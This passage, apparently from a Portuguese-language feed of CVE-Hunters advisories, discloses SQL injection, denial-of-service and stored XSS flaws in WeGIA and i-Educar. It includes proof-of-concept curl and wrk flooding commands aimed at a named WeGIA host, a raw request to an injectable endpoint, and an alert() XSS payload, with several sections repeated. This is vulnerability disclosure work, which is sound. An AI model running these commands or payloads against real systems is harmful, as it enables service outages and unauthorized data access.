style="text-align: justify;"> <ul> <li>Navegue até: <a href="https://demo.wegia.org/html/funcionario/profile_funcionario.php id_funcionario=1" target="_blank">https://demo.wegia.org/html/funcionario/profile_funcionario.php id_funcionario=1</a>;</li> <li>Insira o comando SQL após o parâmetro <code>id</code> como na imagem abaixo:</li> </ul> </p> <p><img src="/p/cve-2025-53529/image.png" width="1912" height="1073" srcset="/p/cve-2025-53529/image_hu_32a2f42d1fd543dd.png 480w, /p/cve-2025-53529/image_hu_e2f18ef0e93db18f.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="178" data-flex-basis="427px" /></p> <p style="text-align: justify;">Observe a mensagem de erro fatal: <code>Uncaught PDOException: SQLSTATE[HY000]: Cardinality violation: 1222 The used SELECT statements have a different number of columns</code>, confirmando inequivocamente a injeção de SQL.</p> <p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rrj6-pj6w-8j2r" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rrj6-pj6w-8j2r</a></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=android_app" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/pedro50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/pedro-henrique-da-costa-lyrio-020a401a3?utm_source=share&utm_campaign=share_via&utm_content=profile&utm_medium=android_app" target="_blank" rel="noopener" >Pedro Lyrio</a></p> <h2 id="colaborador">Colaborador </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53530/ https://www.cvehunters.com/pt/p/cve-2025-53530/ <h2 id="cve-2025-53530-consumo-descontrolado-de-recursos-no-parâmetro-wegia-errorstr">CVE-2025-53530: Consumo descontrolado de recursos no parâmetro WeGIA <code>errorstr</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53530" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53530</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">O servidor WeGia possui uma vulnerabilidade que permite solicitações HTTP GET excessivamente longas para uma URL específica. Esse problema surge da falta de validação do comprimento do parâmetro <code>errorstr</code>. Testes confirmaram que o servidor processa URLs de até 8.142 caracteres, resultando em alto consumo de recursos, latência elevada, timeouts e erros de leitura. Isso torna o servidor suscetível a ataques de Negação de Serviço (DoS).</p><h2 id="cve-2025-53530-consumo-descontrolado-de-recursos-no-parâmetro-wegia-errorstr">CVE-2025-53530: Consumo descontrolado de recursos no parâmetro WeGIA <code>errorstr</code> </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53530" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53530</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">O servidor WeGia possui uma vulnerabilidade que permite solicitações HTTP GET excessivamente longas para uma URL específica. Esse problema surge da falta de validação do comprimento do parâmetro <code>errorstr</code>. Testes confirmaram que o servidor processa URLs de até 8.142 caracteres, resultando em alto consumo de recursos, latência elevada, timeouts e erros de leitura. Isso torna o servidor suscetível a ataques de Negação de Serviço (DoS).</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint vulnerável: <code>GET https://comfirewall.wegia.org:8000/WeGIA?errorstr=AAAA...</code></p> <p style="text-align: justify;"> <ul> <li>O parâmetro <code>errorstr</code> na URL permite que invasores adicionem uma quantidade arbitrária de dados de até <b>8.142 caracteres.</b></li> <li>Não há validação para o comprimento do parâmetro <code>errorstr</code> processado pelo servidor.</li> <li>Durante os testes, o parâmetro foi estendido com caracteres repetidos (<code>errorstr=<value></code>), causando exaustão de recursos, timeouts e erros em conexões de soquete.</li> </ul> </p> <h2 id="poc">PoC </h2><p style="text-align: justify;">Etapas para reproduzir o problema: <ul> <li>Execute a seguinte solicitação HTTP GET para reproduzir o problema:</li> </ul> </p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> curl "https://comfirewall.wegia.org:8000/WeGIA?errorstr=$(python3 -c 'print("A"*8000)')" </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"> <ul> <li>Para simular um ataque de alta carga, use a ferramenta <code>wrk</code>:</li> </ul> </p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> wrk -t12 -c400 -d60s "https://comfirewall.wegia.org:8000/WeGIA?errorstr=$(python3 -c 'print("A"*8000)')" </span></span></code></pre></td></tr></table> </div> </div><video width="100%" height="100%" controls> <source src="404392693-694ff24a-243a-429e-8225-b9de406355fc.mp4" type="video/mp4"> </video> <p style="text-align: justify;"><b>Resultados de Testes Atualizados com <code>wrk</code>:</b> <ul> <li><b>20.180 solicitações</b> foram processadas em 1 minuto.</li> <li><b>719 timeouts</b> e <b>134 erros de leitura</b> ocorreram, indicando que o servidor teve dificuldades para responder à carga.</li> <li>A latência média foi de <b>249,77 ms</b>, com picos atingindo <b>2 segundos</b>.</li> <li>O servidor tentou lidar com a carga, mas demonstrou exaustão significativa de recursos, confirmando sua vulnerabilidade a ataques DoS.</li> </ul> </p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Esta é uma vulnerabilidade de Negação de Serviço. Qualquer usuário não autenticado com acesso a ferramentas como o OWASP ZAP pode explorar esse problema para deixar o servidor sem resposta. Isso afeta a disponibilidade do aplicativo e pode interromper as operações comerciais. A ausência de limitação de taxa e restrições de rastreamento recursivo aumenta o risco e torna a vulnerabilidade explorável por invasores pouco qualificados.</p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-562r-xgj9-2r7p" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-562r-xgj9-2r7p</a></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <h2 id="colaboradores">Colaboradores </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela0x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53531/ https://www.cvehunters.com/pt/p/cve-2025-53531/ <h2 id="cve-2025-53531-consumo-descontrolado-de-recursos-no-parâmetro-fid-do-wegia">CVE-2025-53531: Consumo descontrolado de recursos no parâmetro <code>fid</code> do WeGIA </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53531" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53531</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">O servidor Wegia possui uma vulnerabilidade que permite solicitações HTTP GET excessivamente longas para uma URL específica. Esse problema surge da falta de validação do comprimento do parâmetro <code>fid</code>. Testes confirmaram que o servidor processa URLs de até 8.142 caracteres, resultando em alto consumo de recursos, latência elevada, timeouts e erros de leitura. Isso torna o servidor suscetível a ataques de Negação de Serviço (DoS).</p><h2 id="cve-2025-53531-consumo-descontrolado-de-recursos-no-parâmetro-fid-do-wegia">CVE-2025-53531: Consumo descontrolado de recursos no parâmetro <code>fid</code> do WeGIA </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53531" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53531</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">O servidor Wegia possui uma vulnerabilidade que permite solicitações HTTP GET excessivamente longas para uma URL específica. Esse problema surge da falta de validação do comprimento do parâmetro <code>fid</code>. Testes confirmaram que o servidor processa URLs de até 8.142 caracteres, resultando em alto consumo de recursos, latência elevada, timeouts e erros de leitura. Isso torna o servidor suscetível a ataques de Negação de Serviço (DoS).</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>GET https://comfirewall.wegia.org:8000/WeGIA?fid=111251&file_url=111256&param1=AAAA&param2=BBBB&param3=CCCC...</code></p> <p style="text-align: justify;"> <ul> <li>A URL aceita parâmetros concatenados com <code>&</code>, permitindo que invasores adicionem uma quantidade arbitrária de dados de até <b>8.142 caracteres.</b></li> <li>Não há validação para o comprimento total da URL ou o número de parâmetros processados ​​pelo servidor.</li> <li>Durante o teste, a URL foi estendida com parâmetros repetidos (<code>&param=-value-</code>), causando exaustão de recursos e instabilidade do servidor.</li> </ul> </p> <h2 id="poc">PoC </h2><p style="text-align: justify;">Etapas para reproduzir o problema: <ul> <li>Execute a seguinte solicitação HTTP GET para reproduzir o problema:</li> </ul> </p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> curl "https://comfirewall.wegia.org:8000/WeGIA?fid=111251&file_url=111256$(python3 -c 'print("&param=" + "X"*8000)')" </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;"> <ul> <li>Para simular um ataque de alta carga, use a ferramenta <code>wrk</code>:</li> </ul> </p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> wrk -t12 -c400 -d60s "https://comfirewall.wegia.org:8000/WeGIA?fid=111251&file_url=111256$(python3 -c 'print("&param=" + "X"*8000)')" </span></span></code></pre></td></tr></table> </div> </div><video width="100%" height="100%" controls> <source src="404374779-e8006b99-a94b-4407-a3d5-64fbeaf985f5.mp4" type="video/mp4"> </video> <p style="text-align: justify;"><b>Resultados de testes atualizados com <code>wrk</code>:</b> <ul> <li><b>Solicitações processadas: 20.799 solicitações em 1 minuto, com 330,90 MB lidos.</li> <li><b>Latência média:</b> 280,91 ms, com pico de 2 segundos.</li> <li><b>Erros:</b> 98 erros de leitura e 591 tempos limite ocorreram.</li> <li><b>Taxa de solicitação: 346,07 solicitações/seg.</li> <li><b>Transferência de dados:</b> 5,51 MB/seg.</li> </ul> </p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;">Esta é uma vulnerabilidade de Negação de Serviço. Qualquer usuário não autenticado com acesso a ferramentas como o OWASP ZAP pode explorar esse problema e fazer com que o servidor pare de responder. Isso afeta a disponibilidade do aplicativo e pode interromper as operações comerciais. A falta de limitação de taxa e restrições de rastreamento recursivo aumenta o risco e torna a vulnerabilidade explorável por invasores pouco qualificados.</p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-4ffc-f23j-54m3" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-4ffc-f23j-54m3</a></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/rafael50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/rafael-corvino/" target="_blank" rel="noopener" >Rafael Corvino</a></p> <h2 id="colaboradores">Colaboradores </h2><p><a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/diego50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/diegocbcastro/" target="_blank" rel="noopener" >Diego Castro</a></p> <p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela0x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-53823/ https://www.cvehunters.com/pt/p/cve-2025-53823/ <h2 id="cve-2025-53823-vulnerabilidade-de-injeção-de-sql-baseada-em-tempo-no-parâmetro-id_socio-do-endpoint-processa_deletar_sociophp">CVE-2025-53823: Vulnerabilidade de injeção de SQL (baseada em tempo) no parâmetro <code>id_socio</code> do Endpoint <code>processa_deletar_socio.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53823" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53823</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção de SQL foi descoberta no parâmetro <code>id_socio</code> do endpoint <code>/WeGIA/html/socio/sistema/processa_deletar_socio.php</code>. Esta vulnerabilidade permite a execução de comandos SQL arbitrários, o que pode comprometer a confidencialidade, a integridade e a disponibilidade dos dados armazenados.</p> <h2 id="detalhes">Detalhes </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">POST /WeGIA/html/socio/sistema/processa_deletar_socio.php HTTP/1.1 </span></span><span class="line"><span class="cl">Host: sec.wegia.org:8000 </span></span><span class="line"><span class="cl">Cookie: _ga=GA1.1.1386467242.1751041360; PHPSESSID=dqkolkdi6a6546qv0nnjj0lo86; _ga_F8DXBXLV8J=GS2.1.s1751041359$o1$g1$t1751047102$j12$l0$h0 </span></span><span class="line"><span class="cl">Content-Length: 24 </span></span><span class="line"><span class="cl">Sec-Ch-Ua-Platform: "Linux" </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.9 </span></span><span class="line"><span class="cl">Sec-Ch-Ua: "Not.A/Brand";v="99", "Chromium";v="136" </span></span><span class="line"><span class="cl">Sec-Ch-Ua-Mobile: ?0 </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 </span></span><span class="line"><span class="cl">Accept: / </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded; charset=UTF-8 </span></span><span class="line"><span class="cl">Origin: https://sec.wegia.org:8000 </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Referer: https://sec.wegia.org:8000/WeGIA/html/socio/sistema/ </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Priority: u=1, i </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">id_socio=1&pessoa=fisica </span></span></code></pre></td></tr></table> </div> </div><h2 id="poc">PoC </h2><p><img src="/p/cve-2025-53823/image.png" width="1906" height="732" srcset="/p/cve-2025-53823/image_hu_bf5d4673fc5021aa.png 480w, /p/cve-2025-53823/image_hu_3f7975a45248e0df.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="260" data-flex-basis="624px" ></p><h2 id="cve-2025-53823-vulnerabilidade-de-injeção-de-sql-baseada-em-tempo-no-parâmetro-id_socio-do-endpoint-processa_deletar_sociophp">CVE-2025-53823: Vulnerabilidade de injeção de SQL (baseada em tempo) no parâmetro <code>id_socio</code> do Endpoint <code>processa_deletar_socio.php</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53823" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53823</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de injeção de SQL foi descoberta no parâmetro <code>id_socio</code> do endpoint <code>/WeGIA/html/socio/sistema/processa_deletar_socio.php</code>. Esta vulnerabilidade permite a execução de comandos SQL arbitrários, o que pode comprometer a confidencialidade, a integridade e a disponibilidade dos dados armazenados.</p> <h2 id="detalhes">Detalhes </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">POST /WeGIA/html/socio/sistema/processa_deletar_socio.php HTTP/1.1 </span></span><span class="line"><span class="cl">Host: sec.wegia.org:8000 </span></span><span class="line"><span class="cl">Cookie: _ga=GA1.1.1386467242.1751041360; PHPSESSID=dqkolkdi6a6546qv0nnjj0lo86; _ga_F8DXBXLV8J=GS2.1.s1751041359$o1$g1$t1751047102$j12$l0$h0 </span></span><span class="line"><span class="cl">Content-Length: 24 </span></span><span class="line"><span class="cl">Sec-Ch-Ua-Platform: "Linux" </span></span><span class="line"><span class="cl">Accept-Language: en-US,en;q=0.9 </span></span><span class="line"><span class="cl">Sec-Ch-Ua: "Not.A/Brand";v="99", "Chromium";v="136" </span></span><span class="line"><span class="cl">Sec-Ch-Ua-Mobile: ?0 </span></span><span class="line"><span class="cl">X-Requested-With: XMLHttpRequest </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 </span></span><span class="line"><span class="cl">Accept: / </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded; charset=UTF-8 </span></span><span class="line"><span class="cl">Origin: https://sec.wegia.org:8000 </span></span><span class="line"><span class="cl">Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl">Sec-Fetch-Mode: cors </span></span><span class="line"><span class="cl">Sec-Fetch-Dest: empty </span></span><span class="line"><span class="cl">Referer: https://sec.wegia.org:8000/WeGIA/html/socio/sistema/ </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Priority: u=1, i </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">id_socio=1&pessoa=fisica </span></span></code></pre></td></tr></table> </div> </div><h2 id="poc">PoC </h2><p><img src="/p/cve-2025-53823/image.png" width="1906" height="732" srcset="/p/cve-2025-53823/image_hu_bf5d4673fc5021aa.png 480w, /p/cve-2025-53823/image_hu_3f7975a45248e0df.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="260" data-flex-basis="624px" /></p> <p><img src="/p/cve-2025-53823/image-1.png" width="1912" height="730" srcset="/p/cve-2025-53823/image-1_hu_137be9761b6d02cd.png 480w, /p/cve-2025-53823/image-1_hu_20fbca3e6290c25.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="261" data-flex-basis="628px" /></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Acesso não autorizado a dados confidenciais (por exemplo, usuários, senhas, registros).</li> <li>Enumeração de banco de dados (esquemas, tabelas, usuários, versões).</li> <li>Escalonamento para RCE dependendo da configuração do banco de dados (por exemplo, xp_cmdshell, UDFs).</li> <li>Comprometimento total do aplicativo se encadeado com outras vulnerabilidades.</li> <li>Esse problema afeta todos os usuários e ambientes, pois não requer autenticação e pode ser acessado por meio de um ponto de extremidade público.</li> </ul> </p> <h2 id="referência">Referência </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-p8xr-qg3c-6ww2" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-p8xr-qg3c-6ww2</a></p> <h2 id="encontrado-por">Encontrado por </h2><p><a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/elisangela50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/elisangelasilvademendonca/" target="_blank" rel="noopener" >Elisangela Mendonça</a></p> <h2 id="colaborador">Colaborador </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Mon, 07 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/pt/p/cve-2025-7109/ https://www.cvehunters.com/pt/p/cve-2025-7109/ <h2 id="cve-2025-7109-cross-site-scripting-xss-armazenado-no-endpoint-educar_aluno_beneficio_cadphp-parâmetro-benefício">CVE-2025-7109: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_aluno_beneficio_cad.php</code> parâmetro <code>Benefício</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7109" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7109</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_aluno_beneficio_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Benefício</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_aluno_beneficio_cad.php</code></p><h2 id="cve-2025-7109-cross-site-scripting-xss-armazenado-no-endpoint-educar_aluno_beneficio_cadphp-parâmetro-benefício">CVE-2025-7109: Cross-Site Scripting (XSS) Armazenado no endpoint <code>educar_aluno_beneficio_cad.php</code> parâmetro <code>Benefício</code> </h2><blockquote> <p><em>Publicação CVE: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7109" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7109</a></em></p> </blockquote> <h2 id="resumo">Resumo </h2><p style="text-align: justify;">Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint <code>educar_aluno_beneficio_cad.php</code> do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro <code>Benefício</code>. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.</p> <h2 id="detalhes">Detalhes </h2><p>Endpoint Vulnerável: <code>/intranet/educar_aluno_beneficio_cad.php</code></p> <p>Parâmetro: <code>Benefício</code></p> <p style="text-align: justify;">O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro <code>Benefício</code>. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.</p> <h2 id="poc">PoC </h2><h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"> <span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">alert</span><span class="p">(</span><span class="s1">'PoC VulDB PacXXX'</span><span class="p">)</span><span class="o"><</span><span class="err">/script> </span> </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-7109/image.png" width="1875" height="1001" srcset="/p/cve-2025-7109/image_hu_ce7d7ad02b44b12.png 480w, /p/cve-2025-7109/image_hu_9a61a6d6d6449abc.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="187" data-flex-basis="449px" /></p> <p><img src="/p/cve-2025-7109/image-1.png" width="1889" height="997" srcset="/p/cve-2025-7109/image-1_hu_60a60555d7528d3a.png 480w, /p/cve-2025-7109/image-1_hu_1abeeb2b65e62c22.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="189" data-flex-basis="454px" /></p> <p><img src="/p/cve-2025-7109/image-2.png" width="1701" height="1013" srcset="/p/cve-2025-7109/image-2_hu_ee4aa3fddc8a48a5.png 480w, /p/cve-2025-7109/image-2_hu_eb7ac958f3edf421.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="167" data-flex-basis="403px" /></p> <h3 id="vídeo-poc">Vídeo PoC: </h3><p><a class="link" href="https://youtu.be/Pe33X_zm_TQ" target="_blank" rel="noopener" >https://youtu.be/Pe33X_zm_TQ</a></p> <h2 id="impacto">Impacto </h2><p style="text-align: justify;"> <ul> <li>Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.</li> <li>Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.</li> <li>Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.</li> <li>Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.</li> <li>Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.</li> <li>Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.</li> <li>Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.</li> <li>Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site 